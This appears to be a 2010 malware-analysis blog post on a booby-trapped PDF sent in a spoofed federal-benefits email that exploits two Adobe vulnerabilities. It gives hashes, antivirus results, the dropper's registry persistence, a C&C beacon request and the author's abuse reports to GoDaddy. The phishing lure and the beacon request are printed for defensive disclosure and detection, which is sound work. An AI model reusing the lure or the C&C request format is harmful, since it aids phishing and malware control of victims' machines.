Wednesday, November 10, 2010

CVE-2010-3654 Adobe Reader 0 day + CVE-2010-2883 Flash 10.1.102.64 + Reader 9.4.0.195 PDF Federal Benefits

Common Vulnerabilities and Exposures (CVE)number

CVE-2010-3654 Adobe Flash Player 10.1.85.3 and earlier on Windows, Mac OS X, Linux, and Solaris and 10.1.95.2 and earlier on Android, and authplay.dll (aka AuthPlayLib.bundle or libauthplay.so.0.0.0) in Adobe Reader and Acrobat 9.x through 9.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted SWF content, as exploited in the wild in October 2010.

CVE-2010-2883 Stack-based buffer overflow in CoolType.dll in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a PDF document with a long field in a Smart INdependent Glyphlets (SING) table in a TTF font, as exploited in the wild in September 2010. NOTE: some of these details are obtained from third party information. 

Post Updates

Update 6, Nov 16  2010-------------------------------------------------------------------------------------------
After yesterday tweets (snowfl0w and sempersecurus), GoDaddy took notice and suspended mysundayparty.com domain
here is the email
---------- Forwarded message ----------
From: GoDaddy Abuse Department
Date: Tue, Nov 16, 2010 at 11:16 AM
Subject: RE: reminder - mysundayparty.com complaint
To: Mila

Dear Mila Parkour,

Thank you for bringing this situation to our attention. We have gone
ahead and suspended the domain name in question.
Please let us know if you find any other domain names connected to C&C
servers or other malware distribution.
Regards,
Joe
GoDaddy.com
Spam and Abuse Department
24/7 Abuse Department Hotline: 480-624-2505
ARID1003
 Here is current Whois
Registrant:
debby ryan
411 N. 6th Street, Emery, SD
Emery, SD
sd, shen zhen 90002
China

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: MYSUNDAYPARTY.COM
Created on: 15-Sep-10
Expires on: 15-Sep-11
Last Updated on: 15-Sep-10

Administrative Contact:
ryan, debby g.debbei_@yahoo.com
411 N. 6th Street, Emery, SD
Emery, SD
sd, shen zhen 90002
China
+86.9801455 Fax --

Technical Contact:
ryan, debby g.debbei_@yahoo.com
411 N. 6th Street, Emery, SD
Emery, SD
sd, shen zhen 90002
China
+86.9801455 Fax --

Domain servers in listed order:
NS1.SUSPENDED-FOR.SPAM-AND-ABUSE.COM
NS2.SUSPENDED-FOR.SPAM-AND-ABUSE.COM

Update 5, Nov 15 2010-------------------------------------------------------------------------------------------
mysundayparty.com domain is still active. resent the message below to abuse@godaddy.com
24.248.182.214  
Hostname:    wsip-24-248-182-214.ph.ph.cox.net  - Is it C&C or someone's sinkhole? Anybody?


Update 4, Nov 13 2010-------------------------------------------------------------------------------------------
mysundayparty.com domain is still active
The message that was sent to GoDaddy abuse department on Nov 10, 2010 read
Dear GoDaddy Abuse Department,
mysundayparty.com has been C&C for 0-days malware  

and used in targeted attacks described above.
Please take action asap
Thanks
Update 3 Nov 11, 2010-------------------------------------------------------------------------------------------
Nov 10, 2010
GoDaddy Abuse dept was contacted via email on Nov 10 with the request to take action and suspend mysundayparty.com - used as C&C in the folowing 0day adobe attacks for 3 months in a row:
mysundayparty.com
has been C&C for 0-days malware
Nov 11, 2010 mysundayparty.com is still active


Update 2 Nov 10, 2010----------------------------------------------------------------------------
from Brad Arkin Senior Director, Product Security & Privacy for Adobe Systems:
@bradarkin  
an update for adobe reader will be released next week to address cve-2010-3654. 9.4.0 is vulnerable.

@ jduck1337
Re: http://contagiodump.blogspot.com/2010/11/cve-2010-3654.html - Adobe Reader bundles its own version of Flash. It is not updated
 

Update 1 Nov 10, 2010-----------------------------------------------------------------------------
Screenshot made today, November 10, 2010

I thought this  Security update available for Adobe Flash Player November 4, 2010 with new Flash 10.1.102.64 would fix the problem.

  General File Information

File Open Season Announcements.pdf
MD5 
d143a09611c45ac34ff0f85cc5efcc2e
SHA1
a2378a47bf084a155974b6fd20559732ecac1608
File size :
111729 bytes
Type:  PDF
Distribution: Email attachment

Download

Original Message

From: usajobs@opm.gov [mailto:usaj0bs@yahoo.com]
Sent: Wednesday, November 10, 2010 7:33 AM
To: XXXXXXXXXXXXX
Subject: Federal Benefits Open Season Begins On November 10

This is the time of year to ensure that you have the right health,
dental, or vision insurance coverage for you and your family. It is
also time for you to consider the out-of-pocket medical or dependent
care expenses you can save money on in 2011. The open season will run
November 10, 2010, through December 13, 2010. You should read the Open
Season Announcement (see the attached) thoroughly for important
information pertaining to each program.

The following three programs will be participating in this year's Open
Season for the 2011 plan year:
1.Federal Employees Health Benefits (FEHB) Program;
2.Federal Employees Dental and Vision Insurance Program (FEDVIP);
3.Flexible Spending Accounts (FSA) Program.

Please remember that there are no longer open seasons for the Thrift
Savings Plan (TSP). You may start, stop, or change your TSP
contributions at any time via myPay (DFAS), provided you are eligible
to participate in the TSP.

Message Headers

Received: from [173.245.79.62] by web120310.mail.ne1.yahoo.com via HTTP; Wed, 10 Nov 2010 04:32:55 PST
Date: Wed, 10 Nov 2010 04:32:55 -0800
From: "usajobs@opm.gov"
Reply-To: "usajobs@opm.gov"
To: XXXXXXXXXXXXXXXXXXXXXX
Message-ID: <855251712.57555.1289392517031.JavaMail.service@localhost>
Subject: Federal Benefits Open Season Begins On November 10
MIME-Version: 1.0
Content-Type: multipart/mixed;
    boundary="----=_Part_57554_885518946.1289392517030"
Delivered-To: XXXXXXXXXXXXXXXX
Received-SPF: pass (google.com: best guess record for domain of usaj0bs@yahoo.com designates 98.138.91.66 as permitted sender) client-ip=98.138.91.66;
Authentication-Results: mx.google.com; spf=pass (google.com: best guess record for domain of usaj0bs@yahoo.com designates 98.138.91.66 as permitted sender) smtp.mail=usaj0bs@yahoo.com; dkim=pass (test mode) header.i=@yahoo.com
X-Yahoo-Newman-Property: ymail-3
X-Yahoo-Newman-Id: 273636.18703.bm@omp1011.mail.ne1.yahoo.com
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1289392375; bh=JwcFHdceH3fqqdYHdMAn56STB43egwMkweBMk6XmrFs=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type; b=5My/a8O9f9L1V7zXZkIRZ8IcN+UbseUxx50qRLsVsMra6zq7MWdmA0rcayL19usi2IVAdLJRJbgTrkAbXmc1Q4u/lCISSMj5D10t+/4BsqCDD0ZEdaoa4W4VDZNj92Nv7He1mXNCpv6NLF9+BQletQNYCCOqxCrB9DUZRW4xAUU=
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type;
  b=urZU8LaQrCLdc7SpBI1+/aimAvIgh+XrG2TPLek1jcZfSbE68/rYw2Q5AjjBGLOK2UVPnqNfBAE6r4CbgaJisM74ZrKoCpPHx10fe4cvIkXi2sWiGEUcBudx15EaDgM6FnrWvFQhOo+RB/mTVmTohJvslG8XpmYT9/FSUQKnSyU=;
X-YMail-OSG: ZbW_TywVM1njbfFrytll2Be76lGDNQqcG_QM8kxiaDCEfzd
 mveVq3CVEal2XRvtmqUe3zVynkT8co6IVMltAhn6YPxXi4NCdR2.5BoOM3e8
 85ATkMtJHepUjLmAmzK5sSMs4zYJgeBBMcSu7FHDywJVLCSVVotqd6xgWBF6
 .6e_0QZCsvl8KRvPiRW_1azNLxSjwhpiX.H9AMA--
X-Mailer: YahooMailRC/504.5 YahooMailWebService/0.8.107.284920

Sender


Hostname:    173.245.79.62
ISP:    EGIHosting
Organization:    EGIHosting
Country:    United States us flag
State/Region:    California
City:    Milpitas

Same ISP and IP range as posted earlier  in http://contagiodump.blogspot.com/2010/10/potential-new-adobe-flash-player-zero.html

Automated Scans

File name: Open Season Announcements.pdf
http://www.virustotal.com/file-scan/report.html?id=d6c999e9279765f8924ed91422370193ea6ef856b2478513013bb3b75114f1c5-1289403795
Submission date: 2010-11-10 15:43:15 (UTC)
Result: 7/ 43 (16.3%)
AhnLab-V3 2010.11.10.02 2010.11.10 SWF/Cve-2010-3654
AntiVir 7.10.13.202 2010.11.10 EXP/CVE-2010-3654.A
DrWeb 5.0.2.03300 2010.11.10 Exploit.PDF.1641
Fortinet 4.2.249.0 2010.11.10 PDF/CoolType!exploit.CVE20102883
Kaspersky 7.0.0.125 2010.11.10 Exploit.Win32.CVE-2010-3654.a
Microsoft 1.6301 2010.11.10 Exploit:Win32/CVE-2010-2883.A
Sophos 4.59.0 2010.11.10 Mal/PDFJs-Z
MD5   : d143a09611c45ac34ff0f85cc5efcc2e
SHA1  : a2378a47bf084a155974b6fd20559732ecac1608

From Malware tracker (thank you)
http://www.malwaretracker.com/pdfsearch.php?hash=d143a09611c45ac34ff0f85cc5efcc2e
content/type: PDF document, version 1.6
Object 12.0 @ 1395: suspicious.flash Embedded Flash define obj
Object 20.0 @ 4405: pdf.exploit fontfile SING table overflow CVE-2010-2883 A
Object 20.0 @ 4405: pdf.exploit fontfile SING table overflow CVE-2010-2883 generic
Object 26.0 @ 6374: pdf.exploit fontfile SING table overflow CVE-2010-2883 generic
Object 26.0 @ 6374: pdf.exploit fontfile SING table overflow CVE-2010-2883 A
Object 29.0 @ 102721: suspicious.string heap spray shellcode
Object 35.0 @ 5648: pdf.exploit fontfile SING table overflow CVE-2010-2883 A
Object 39.0 @ 8560: suspicious.obfuscation using substring
Object 39.0 @ 8560: suspicious.obfuscation using String.replace
Object 49.0 @ 15067: suspicious.flash Adobe Shockwave Flash in a PDF define obj type
Object 50.0 @ 15464: suspicious.flash Embedded Flash
Object 50.0 @ 15464: flash.exploit CVE-2010-3654
Object 56.0 @ 12318: suspicious.obfuscation using unescape



Files Created















Decoy file
%Temp%\Open Season Announcements.pdf
http://www.virustotal.com/file-scan/report.html?id=72b3342ad2132931d8e6524ef11b9e36b05c90cf707346c05acd01b801b28e0b-1289423081
0/42 
MD5   : db1991c1120c3f75991cbe91c2649ad3

\Local Settings\adobeupdate.exe
http://www.virustotal.com/file-scan/report.html?id=590bdc2952e54739d2d3b0a692691d7ec6f7489a7944a9798feaa513c07aa91e-1289418563
File name:adobeupdate.exe
Submission date:2010-11-10 19:49:23 (UTC)
Result:15/ 43 (34.9%)
AntiVir    7.10.13.204    2010.11.10    TR/Dropper.Gen
Authentium    5.2.0.5    2010.11.10    W32/Heuristic-257!Eldorado
BitDefender    7.2    2010.11.10    Gen:Trojan.Heur.RP.cqW@a8FFwjdb
DrWeb    5.0.2.03300    2010.11.10    BACKDOOR.Trojan
F-Prot    4.6.2.117    2010.11.10    W32/Heuristic-257!Eldorado
F-Secure    9.0.16160.0    2010.11.10    Gen:Trojan.Heur.RP.cqW@a8FFwjdb
GData    21    2010.11.10    Gen:Trojan.Heur.RP.cqW@a8FFwjdb
K7AntiVirus    9.67.2940    2010.11.09    Riskware
Kaspersky    7.0.0.125    2010.11.10    Heur.Invader
McAfee-GW-Edition    2010.1C    2010.11.10    Heuristic.BehavesLike.Win32.Trojan.H
Microsoft    1.6301    2010.11.10    Trojan:Win32/Wisp.A
NOD32    5608    2010.11.10    probably a variant of Win32/Wisp.A
Panda    10.0.2.7    2010.11.10    Suspicious file
Sophos    4.59.0    2010.11.10    Mal/Mdrop-B
VBA32    3.12.14.1    2010.11.09    suspected of Win32.Trojan.Downloader
MD5   : 27ba4695567a60f25a32bab240b3b832
SHA1  : 8f9e5aee02a4b340faae1a8057db419a34ace951
SHA256: 590bdc2952e54739d2d3b0a692691d7ec6f7489a7944a9798feaa513c07aa91e
ssdeep: 768:OpUElc+SsQvCXVD/5HiS/LcMRt50fQtW96VTD+eXrAyb:ZEUS3H3H750fQOQAw
File size : 37376 bytes

threatexpert
http://www.threatexpert.com/report.aspx?md5=27ba4695567a60f25a32bab240b3b832

    * The newly created Registry Value is:
          o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
                + start = "%UserProfile%\LOCALS~1\adobeupdate.exe -installkys"

            so that adobeupdate.exe runs every time Windows starts
  • Analysis of the file resources indicate the following possible country of origin:

China

 Sykipot exploits an Adobe Flash Zero-Day  Kaspersky www.securelist.com
Read full analysis at the link above. This is an excerpt
When executed, the bot checks for command line options. The '-installkys' option installs the bot onto the victim machine. Interestingly enough, if you use the '-removekys' parameter the malware gets entirely removed from the system – a built in unistall. The malware then calls itself without any parameters and the malicious code is run. The screenshot below shows the code for parsing the command line parameters.
The binary drops a DLL, the actual malware, to the hard drive and scans the list of running processes for outlook.exe, iexplore.exe, and firefox.exe. If a matching process is found, the dropped DLL gets injected and executed as a new thread.
The injected code will send an HTTP request to news.mysundayparty.com every 5 minutes and download an encrypted configuration file. The DNS entry seems to be somewhat fluxy: it has a TTL of 1800 seconds, and the IP address it resolves to changes every now and then. A decrypted config file contains a list of commands to gather information about the infected host. This information is encrypted and sent back to the server. 
Searching the web for strings from this file reveals an interesting connection with a piece of malware that was spreading at the beginning of this year. Similar to the current bot, this earlier virus exploits a zero-day vulnerability, collects information about the infected machine and sends it back to its master. A still earlier version is reported to exploit another Flash zero-day.
A nice thing is that each configuration download request contains all the necessary information to track down infected hosts in a network. Below is what the HTTP GET request for the config file looks like. The path contains one parameter assembled from the Windows host name and its IP address with the prefix '-nsunday' and is quite unique. Also note the Referer field, which is always set to http://www.yahoo.com/, and the characteristic Accept header. Constructing a reliable IDS signature should not be too hard.
GET /asp/kys_allow_get.asp?name=getkys.kys&hostname=PC-192.168.0.1-nsunday HTTP/1.1
Referer: http://www.yahoo.com/
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash,
  application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7
Host: news.mysundayparty.com
Cache-Control: no-cache

Network activity

news.mysundayparty.com -
24.248.182.214  
Hostname:    wsip-24-248-182-214.ph.ph.cox.net
ISP:    Cox Communications
Organization:    Cox Communications
Country:    United States 
State/Region:    Arizona
City:    Peoria

Compare to ips for the same domain posted earlier  http://contagiodump.blogspot.com/2010/10/potential-new-adobe-flash-player-zero.html

Domain news.mysundayparty.com
Nov 10, 2010
GoDaddy Abuse dept was contacted Nov 10 with the request to take action and suspend mysundayparty.com - used as C&C in the folowing 0day adobe attacks for 3 months in a row:
mysundayparty.com
has been C&C for 0-days malware
Nov 11, 2010 mysundayparty.com is still active


BaseRecordNameIPReverseRouteAS
news.mysundayparty.coma 24.248.182.214
United States
wsip-24-248-182-214.ph.ph.cox.net24.248.176.0/20
Proxy-registered route object
AS6298
COX-PHX Cox Communications Inc.
mysundayparty.coma 68.178.232.100
United States
(none) 68.178.232.0/22AS26496
PAH-INC Go Daddy Software, Inc.
ns-soa ns09.domaincontrol.com
5 hours old
216.69.185.5
United States
216.69.185.0/24
ns ns09.domaincontrol.com
5 hours old
216.69.185.5
United States
ns10.domaincontrol.com
9 days old
(only in delegation)
208.109.255.5
United States
208.109.255.0/24
mx 10mailstore1.secureserver.net
10 hours old
216.69.186.201
United States
m1pismtp01-v01.prod.mesa1.secureserver.net216.69.184.0/22
0smtp.secureserver.net
13 hours old
216.69.186.201
United States

No comments:

Post a Comment